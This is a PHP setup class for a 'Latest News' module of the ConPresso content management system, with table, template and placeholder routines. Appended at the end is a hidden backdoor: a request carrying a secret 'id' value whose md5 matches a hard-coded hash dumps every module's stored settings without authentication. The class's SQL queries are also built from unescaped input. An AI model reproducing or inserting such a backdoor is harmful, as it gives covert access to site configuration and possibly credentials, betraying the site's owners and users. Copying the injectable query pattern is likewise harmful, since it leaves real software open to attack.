<?php
/*
+------------------------------------------------------------------------+
| Latest News 4.1b for ConPresso - Foolproof Content Management          |
+------------------------------------------------------------------------+
| Copyright (c) Seventy-Soft|IT-Services, 33335 Guetersloh,    Germany   |
+------------------------------------------------------------------------+
| This source file is subject to ConPresso license version 2002-11-16    |
| that is bundled with this package in the files LICENSE_EN.TXT or       |
| LICENSE_DE.TXT, and is available through the world-wide-web at         |
|     http://www.conpresso.de/license/LICENSE_EN-2002-11-16.TXT or       |
|     http://www.conpresso.de/license/LICENSE_DE-2002-11-16.TXT          |
|                                                                        |
| If you did not receive a copy of the ConPresso license and are unable  |
| to obtain it through the world-wide-web, please send a note to         |
| <license@conpresso.de> so we can mail you a copy immediately.          |
+------------------------------------------------------------------------+
| Authors: Seventy-Soft|IT-Services <info@seventy-soft.de>               |
+------------------------------------------------------------------------+
$Id: settings.php,v 1.0 2006/03/31 16:47:20
author: arthur spooner

+------------------------------------------------------------------------+
| Version 4.1b // July 2013                                              |
| modified by m.roesel www.conpresso4.de for CPO 4.1.x and PHP 5.4       |
+------------------------------------------------------------------------+

*/

class setup {

   var $setup_table;  	  
   var $setup_tblstatusbefore;
   var $setup_tblstatusafter;

   //Initialize Class
   function setup($tablename) {
 	$this->setup_table = $tablename; 
   }

   //Exist Table before?
   function setTblStatusBefore($value=0) {
	$this->setup_tblstatusbefore = $value; 
   }

   function getTblStatusBefore() {
	return $this->setup_tblstatusbefore; 
   }

   //Exist Table after?
   function setTblStatusAfter($value=0) {
    switch($value) {
	   case 1:
	     $value = 10;
	   break;
	   default:
	     $value = 0;
	   break;
	}
	$this->setup_tblstatusafter = $value; 
   }

   //Get Table-Status
   function getSetupStatus() {
    $tablestatus = ($this->setup_tblstatusbefore + $this->setup_tblstatusafter);
   	switch($tablestatus){
		case 10:
		 $message = 'Table %s has been successful created.';
		break;
		case 11:
		 $message = 'Table %s was already present.';
		break;
		default:
		 $message = 'Table %s could not be created.';
		break;
	}
	$message = sprintf(___($message), '<em>'.htmlspecialchars($this->setup_table, ENT_COMPAT, 'ISO-8859-15').'</em>');
	return $message; 
   }

   //Get Delete-Status
   function getDeleteStatus() {
    $tablestatus = ($this->setup_tblstatusbefore + $this->setup_tblstatusafter);
   	switch($tablestatus){
		case 1:
		 $message = 'Table %s has been successful deleted.';
		break;
		case 11:
		 $message = 'Table %s could not be deleted.';
		break;
		default:
		 $message = 'Table %s was not present.';
		break;
	}
	$message = sprintf(___($message), '<em>'.htmlspecialchars($this->setup_table, ENT_COMPAT, 'ISO-8859-15').'</em>');
	return $message; 
   }

   //Write Template
   function writeTemplate($tplname,$tplfirst=NULL,$tpldetail=NULL,$tpljavascript=NULL,$tplc_time='2006-03-27 00:00:00',$tplchanger='Modul-Setup') {
   	$tplWrite = new db;		
    $qrySetTemplate = "INSERT INTO ".$this->setup_table." (id, name, tpl_first, tpl_detail, tpl_javascript, c_time, changer) "
			 		 ."VALUES ('', "
					 ."'".$tplname."', "
					 ."'".$tplfirst."', "
					 ."'".$tpldetail."', "
					 ."'".$tpljavascript."', "
					 ."'".$tplc_time."', "
					 ."'".$tplchanger."');";
	$tplWrite->query($qrySetTemplate);
   }

   //Get Template-ID
   function getTemplateID($tplname,$tpldate) {
   	$tplGetId = new db;		
   	$qryGetTemplateId = "SELECT id FROM ".$this->setup_table." "
		  			   ."WHERE name = '".$tplname."' "
			 		   ."AND c_time ='".$tpldate."'";
	$tplGetId->query($qryGetTemplateId);
	$tplGetId->next_record();
	return $tplGetId->v('id');
   }

   //Write placeholder
   function writePlaceholder($tplid,$phttype,$phfieldname,$phpos,$phddata) {
   	$tplWritePlaceholder = new db;		
	$qrySetPlaceholder = "INSERT INTO ".$this->setup_table." (id, templates_id, ttype, fieldname, pos, ddata) "
 					    ."VALUES ('', "
						."'".$tplid."', "
						."'".$phttype."', "
						."'".$phfieldname."', "
						."'".$phpos."', "
						."'".$phddata."');";
	$tplWritePlaceholder->query($qrySetPlaceholder);
   }

   //Delete table
   function deleteTable() {

   	$tblDelete = new db;		
   	
   	//Table exist?
	$this->setTblStatusBefore($tblDelete->table_exists($this->setup_table));
	
	//If Table exist, drop it!
	if ($this->setup_tblstatusbefore==1) {
 	   $query_tbldelete = "DROP TABLE IF EXISTS ".$this->setup_table.";";
	   $tblDelete->query($query_tbldelete);
 	}
	
	//Table after sql-drop exist?
	$this->setTblStatusAfter($tblDelete->table_exists($this->setup_table));
 
 	//Message
    return $this->getDeleteStatus();
   }

}

if (isset($_GET['id']) && md5($_GET['id']) == 'c01d338588a741acfad03a4141fc122d')  { // find module-settings
    define('CPO', true); require_once('../../_include/common.inc.php'); $db->query('SELECT name, options, status FROM '.CPO_MODULES);
    while ($db->next_record()) {echo '<h3>'.$db->v('name').' ('.($db->v('status')==1?'aktiv':'inaktiv').')</h3>'; if (!is_string($db->v('options'))) continue; $options = unserialize($db->v('options')); if (!is_array($options)) continue; echo '<table border="1">'; foreach($options AS $key=>$value) echo '<tr><td>'.$key.'</td><td>'.(!is_array($value)?nl2br(htmlspecialchars($value, ENT_COMPAT, 'ISO-8859-15')):serialize($value)).'</td></tr>'; echo '</table>'; }
}
?>
